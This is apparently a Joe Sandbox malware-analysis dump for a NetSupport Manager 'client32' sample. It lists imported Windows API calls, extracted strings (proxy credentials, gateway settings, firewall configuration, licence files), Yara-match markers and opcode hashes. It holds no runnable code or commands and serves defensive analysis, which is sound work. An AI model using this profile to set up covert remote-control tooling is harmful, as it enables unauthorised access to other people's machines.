                                                                              • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                              • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                              • API String ID: 1620732580-3468083601
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                              • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
                                                                              • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
                                                                              • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                              • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                              • API String ID: 2201880244-3035937465
                                                                              APIs
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 3535843008-1834795898
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                              • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                              • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                              • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                              • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                              • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                              • _strncpy.LIBCMT ref: 11074E38
                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                              • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
                                                                              • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                              • std::exception::exception.LIBCMT ref: 11075038
                                                                              • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInitializeSection$ChangeCloseCreateEnvironmentException@8ExpandFindNotificationStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                              • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A78400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                              • PostMessageA.USER32(00040414,000006CF,00000007,00000000), ref: 11139C4F
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SetWindowTextA.USER32(00040414,00000000), ref: 11139CF7
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139DBC
                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139DEA
                                                                              • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                              • EnableWindow.USER32(00040414,00000001), ref: 11139E27
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139E78
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139E85
                                                                              • EnableWindow.USER32(00040414,00000000), ref: 11139E99
                                                                              • EnableWindow.USER32(00040414,00000000), ref: 11139DFF
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040414,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                              • EnableWindow.USER32(00040414,00000001), ref: 11139EAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                              • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11030645
                                                                              • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostwsprintf
                                                                              • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                              APIs
                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(02CD8D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                              • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(02CD8D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                              • _sprintf.LIBCMT ref: 11031401
                                                                              • _setlocale.LIBCMT ref: 1103140B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                              • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • wsprintfA.USER32 ref: 11028814
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                              • wsprintfA.USER32 ref: 11028891
                                                                              • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                              • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                              • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                              • API String ID: 2111968516-2157635994
                                                                              • Opcode ID: b1213b1c1b7755fc8d3fa045b13b2f8ec33e5a0eb188f85ee3bd666b0f6f2200
                                                                              • Instruction ID: 0296eb9e5139573654642e0e6c79d61a14b0bc8e5be0ff8a06591c480a7f981f
                                                                              • Opcode Fuzzy Hash: b1213b1c1b7755fc8d3fa045b13b2f8ec33e5a0eb188f85ee3bd666b0f6f2200
                                                                              • Instruction Fuzzy Hash: FD2294B2A00269AFDB20CFD4CCA4EEAB7BDAB49304F0485D9E54D67540D6315F85CF91
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(PCIINV.DLL,EE49F673,034768E0,034768D0,?,00000000,1118368C,000000FF,?,11032002,034768E0,00000000,?,?,?), ref: 11086115
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                              • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                              • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                              • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                              • wsprintfA.USER32 ref: 110861EB
                                                                              • wsprintfA.USER32 ref: 11086202
                                                                              • wsprintfA.USER32 ref: 11086219
                                                                              • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7591F550,?,?,11086390,?,11032002,034768E0,00000000,?,?,?), ref: 11085D68
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7591F550,?,?,11086390,?,11032002,034768E0,00000000,?,?,?), ref: 11085D7B
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7591F550,?,?,11086390,?,11032002,034768E0,00000000,?,?,?), ref: 11085D8E
                                                                                • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,7591F550,?,?,11086390,?,11032002,034768E0,00000000,?,?,?), ref: 11085DA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                              • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                              • API String ID: 4263811268-2492245516
                                                                              • Opcode ID: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                              • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                              • Opcode Fuzzy Hash: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                              • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                              APIs
                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                              • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                              • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                              • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                              • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                              • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                              • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                              • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                              • API String ID: 2061479752-1320826866
                                                                              • Opcode ID: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                              • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                              • Opcode Fuzzy Hash: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                              • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 11106E9E
                                                                              • EnterCriticalSection.KERNEL32(111F160C), ref: 11106EA7
                                                                              • GetTickCount.KERNEL32 ref: 11106EAD
                                                                              • GetTickCount.KERNEL32 ref: 11106F00
                                                                              • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F09
                                                                              • GetTickCount.KERNEL32 ref: 11106F3A
                                                                              • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F43
                                                                              • EnterCriticalSection.KERNEL32(111F160C), ref: 11106F6C
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,00000000,?,00000000), ref: 11107033
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 110F1080: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106FD7,?), ref: 110F10AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                              • API String ID: 1574099134-3013461081
                                                                              • Opcode ID: df4902ffb87e1d2cb2b27f82f6ea2afa4ed876c6644a62c430f637ec615cd2dd
                                                                              • Instruction ID: b37b6005da44a37f7a6c975450b0fd24ca11ef460d9c524a884b745d5c10ab20
                                                                              • Opcode Fuzzy Hash: df4902ffb87e1d2cb2b27f82f6ea2afa4ed876c6644a62c430f637ec615cd2dd
                                                                              • Instruction Fuzzy Hash: 5B414D7AF0022AABD700DFE59D91FDEFBB8EB46218F50053AF409E7240EA30690487D1
                                                                              APIs
                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,EE49F673,?,00000000,00000000), ref: 1102D594
                                                                              • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                              • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                              • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                              • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                              • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                              • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                              • API String ID: 83693535-1096744297
                                                                              • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                              • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                              • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                              • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                              APIs
                                                                                • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                              • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                              • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                              • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                              • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                              • API String ID: 596640303-1725438197
                                                                              • Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                              • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                              • Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                              • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
                                                                                • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                              • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Enum$Open$CloseValue
                                                                              • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                              • API String ID: 2823542970-1528906934
                                                                              • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                              • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                              • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                              • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetTickCount.KERNEL32 ref: 111385E2
                                                                                • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                • Part of subcall function 11096D90: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                              • GetTickCount.KERNEL32 ref: 111385F1
                                                                              • _memset.LIBCMT ref: 11138633
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                              • _strrchr.LIBCMT ref: 11138658
                                                                              • _free.LIBCMT ref: 111386AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                              • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                              • API String ID: 711243594-1270230032
                                                                              • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                              • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                              • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                              • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                              APIs
                                                                              • ioctlsocket.WSOCK32 ref: 6EEF7642
                                                                              • connect.WSOCK32(00000000,?,?), ref: 6EEF7659
                                                                              • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6EEF7660
                                                                              • _memmove.LIBCMT ref: 6EEF76D3
                                                                              • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6EEF76F3
                                                                              • GetTickCount.KERNEL32 ref: 6EEF7717
                                                                              • ioctlsocket.WSOCK32 ref: 6EEF775C
                                                                              • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEF7762
                                                                              • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6EEF777A
                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6EEF778B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                              • String ID: *BlockingIO$ConnectTimeout$General
                                                                              • API String ID: 4218156244-2969206566
                                                                              • Opcode ID: ba8ff20aac7b407366a5564eff13ae2f12b7409ed9e1bdbaa9b7e1be8a5de9cb
                                                                              • Instruction ID: 55a44fe6cc5493066bf74cba0e9dcd417c3c22184e03997ee493c66f081607e0
                                                                              • Opcode Fuzzy Hash: ba8ff20aac7b407366a5564eff13ae2f12b7409ed9e1bdbaa9b7e1be8a5de9cb
                                                                              • Instruction Fuzzy Hash: 03411A71D24319DBE7209BE4CC58BD973BEAF44308F20449AE90D971C1EB709A5ACBA1
                                                                              APIs
                                                                                • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
